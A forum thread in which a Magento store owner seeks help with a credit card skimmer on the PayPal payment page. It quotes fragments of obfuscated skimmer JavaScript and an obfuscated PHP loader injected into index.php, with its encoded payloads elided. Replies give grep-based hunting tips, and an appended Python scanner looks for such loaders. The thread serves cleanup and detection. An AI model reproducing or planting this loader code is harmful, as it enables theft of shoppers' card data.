
Script injection below body tag in Magento 2.4.1

I upgraded our Magento from 1.9 to 2.4.1 after we found malware that was trying to copy customer credit cards before allowing the customer to use PayPal.

I used Magento's migration tools to copy data to the new site. I'm also using a Porto theme that's been modified.

 

Then I couldn't believe it. The payment page on the new 2.4.1 version site was showing the same credit card skimmer. As the page loads you can see PayPal appear, then it is hidden by the skimmer. PayPal is the only payment option I should have.

 

I've used a virus scan on the server. I also used the Magento Security Scan, which, to my surprise, came back with 'Your Magento installation has not been compromised with known injected JavaScript malware.'

 

I found the code was being injected below the <body> tag. If I flush the JavaScript cache, the malicious script ends up at the bottom of all the other .js files that are loaded, which causes the page not to load. Below is the code that is being injected.

 

The index.php file in the Magento root folder had been modified with the code below, but the issue was still there after I removed the code. Below is the code I found in that file.

I have also searched the database for 'script' and 'var' without any luck.

Thanks so much for any help! Please I'm not sure what to do next.

 

Card Skimmer after page loads

 

Snippet of the code being injected (the code is very obfuscated):

... var a0a=['wwjwwM4=','sKfKvva=','pIa8zgL2ignSyq==','DgTvCLe=','wLnXwLK=','A01Tr0m=','rgXvtMi=','BNLRreW=','y19JAwqNxq==','suz6q3e=','sfnLuge=','i2nHCMqTy29Kzq==','phnLBgvJDcbPza==','AKzjD2O=','thv6s0i=','x3LYiIbUyw1Lpq==','tuf6zNa=','y3rVCIGICMv0Dq==','vNzNB2e=','sMvKy1K=','zKfnvhO=', ...

 

 

This is what was injected into the index.php file:

... $BcKxNeHlLm="\x73";$WYRrPhjfq="\156\157";$BcKxNeHlLm.="\x74";$wTGBOhd1Y="\164";$BcKxNeHlLm.="\162";$BcKxNeHlLm.="\162";$hOTFW1f="\x65";$wTGBOhd1Y.="\162\x65\163";$WYRrPhjfq.="\x69\164\143";$hOTFW1f.="\144";$BcKxNeHlLm.="\145\166";$wTGBOhd1Y.="\163";$hOTFW1f.="\x6f\x63";$hOTFW1f.="\145\x64";$WYRrPhjfq.="\156\x75";$hOTFW1f.="\137";$hOTFW1f.="\x34";$hOTFW1f.="\66\145";$WYRrPhjfq.="\x66\x5f\x65";$WYRrPhjfq.="\x74\x61\145";$WYRrPhjfq.="\x72\x63";$wTGBOhd1Y.="\x61";$hOTFW1f.="\x73\141";$hOTFW1f.="\142";$WYRrPhjfq=$BcKxNeHlLm($WYRrPhjfq);$hOTFW1f=$BcKxNeHlLm($hOTFW1f);$wTGBOhd1Y=$BcKxNeHlLm($wTGBOhd1Y);$tE09pMRXE="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";$n6q0cF0W="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";if(function_exists($WYRrPhjfq)){$MvvxmN=@$WYRrPhjfq('$tE09pMRXE,$BcKxNeHlLm',$hOTFW1f($BcKxNeHlLm($n6q0cF0W)));if($MvvxmN)$tE09pMRXE=@$MvvxmN($tE09pMRXE,$BcKxNeHlLm); }else{$L5scE3="\51\x29\51";$L5scE3.="\x57";$L5scE3.="\60\106";$L5scE3.="\143";$L5scE3.="\60\161\x36";$L5scE3.="\156\44\x28";$L5scE3.="\x6d\114\x6c";$L5scE3.="\110\x65\x4e";$L5scE3.="\x78";$L5scE3.="\x4b";$L5scE3.="\143\x42";$L5scE3.="\x24\x28\146";$L5scE3.="\x31\x57";$L5scE3.="\x46\124";$L5scE3.="\117\x68";$L5scE3.="\x24\50\154";$L5scE3.="\141";$L5scE3.="\x76\x65\x40";$L5scE3=$BcKxNeHlLm($L5scE3);@$wTGBOhd1Y($L5scE3);};if(function_exists($WYRrPhjfq)){$Lhtbvwfqj=@$WYRrPhjfq("",$hOTFW1f($BcKxNeHlLm($tE09pMRXE)));if($Lhtbvwfqj)@$Lhtbvwfqj();}else{$rUUXAfo="\x29\51\51";$rUUXAfo.="\x45\x58";$rUUXAfo.="\122\115";$rUUXAfo.="\x70";$rUUXAfo.="\x39";$rUUXAfo.="\x30\x45\x74";$rUUXAfo.="\44\x28\x6d";$rUUXAfo.="\x4c";$rUUXAfo.="\x6c\x48";$rUUXAfo.="\x65\x4e";$rUUXAfo.="\x78\113\x63";$rUUXAfo.="\102\44\x28";$rUUXAfo.="\146\x31";$rUUXAfo.="\127\x46";$rUUXAfo.="\124";$rUUXAfo.="\117\x68";$rUUXAfo.="\44";$rUUXAfo.="\50\154";$rUUXAfo.="\141\x76";$rUUXAfo.="\145\100";$rUUXAfo=$BcKxNeHlLm($rUUXAfo);@$wTGBOhd1Y($rUUXAfo);};/* ...


Re: Script injection below body tag in Magento 2.4.1

Hi, did you find where the problem was? I have the same problem in Magento 1.9.x

Re: Script injection below body tag in Magento 2.4.1

Search on your server with SSH.
I found 3 infected files.

 

grep -rni "CURLOPT_RETURNTRANSFER" ./*

I found ./app/code/core/Mage/Core/Model/App.php:416: curl_setopt($hethajok, CURLOPT_RETURNTRANSFER, true);

 

hethajok is not a Magento variable.

 

check:

app/mage.php

app/code/core/Mage/Core/Model/App.php
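
Added example, not part of any post in this thread: a Python scan that generalizes the grep from the last reply to three patterns visible above (function names built from escaped bytes with `.=`, error-suppressed calls through a variable, and `curl_setopt(..., CURLOPT_RETURNTRANSFER` on an unexpected handle). The indicator names, the threshold and the sample strings are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Escaped bytes inside PHP string literals, e.g. "\x73" or "\156".
ESCAPE = re.compile(r'\\(?:x[0-9A-Fa-f]{2}|[0-7]{2,3})')
# Error-suppressed call through a variable, e.g. @$name(...).
SUPPRESSED_VAR_CALL = re.compile(r'@\$[A-Za-z_]\w*\s*\(')
# The indicator from the last reply: a curl handle set to return its transfer.
CURL = re.compile(r'curl_setopt\s*\(\s*\$\w+\s*,\s*CURLOPT_RETURNTRANSFER')

# Constructed samples (harmless, shaped like the lines quoted in the thread).
SAMPLE_INFECTED = (r'<?php $a="\x73";$a.="\x74\162";$a.="\162\145\166";'
                   r'$b="\156\157\x69\164";$b.="\143";$b=$a($b);@$b("x");')
SAMPLE_CLEAN = ("<?php\nrequire __DIR__ . '/app/bootstrap.php';\n"
                "$bootstrap = \\Magento\\Framework\\App\\Bootstrap::create(BP, $_SERVER);\n")
SAMPLE_CURL = "<?php\ncurl_setopt($hethajok, CURLOPT_RETURNTRANSFER, true);\n"

def indicators(text, min_escapes=10):
    """Return the names of the indicators that fire for one PHP source text."""
    hits = []
    # One line that both concatenates strings and is dense with escaped bytes.
    if any('.=' in line and len(ESCAPE.findall(line)) >= min_escapes
           for line in text.splitlines()):
        hits.append('escaped-string-builder')
    if SUPPRESSED_VAR_CALL.search(text):
        hits.append('suppressed-variable-call')
    if CURL.search(text):
        hits.append('curl-returntransfer')
    return hits

def scan_tree(root, patterns=('*.php', '*.phtml')):
    """Map each matching file under root (relative path) to its indicators."""
    findings = {}
    for pattern in patterns:
        for path in Path(root).rglob(pattern):
            if path.is_file():
                text = path.read_text(encoding='utf-8', errors='replace')
                hits = indicators(text)
                if hits:
                    findings[str(path.relative_to(root))] = hits
    return findings

if __name__ == '__main__':
    # Usage: python scan.py /path/to/magento/root
    for name, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else '.').items()):
        print(f"{name}: {', '.join(hits)}")
```

Legitimate code also calls curl, so each hit is a lead to compare against a clean copy of the same release, not proof of infection.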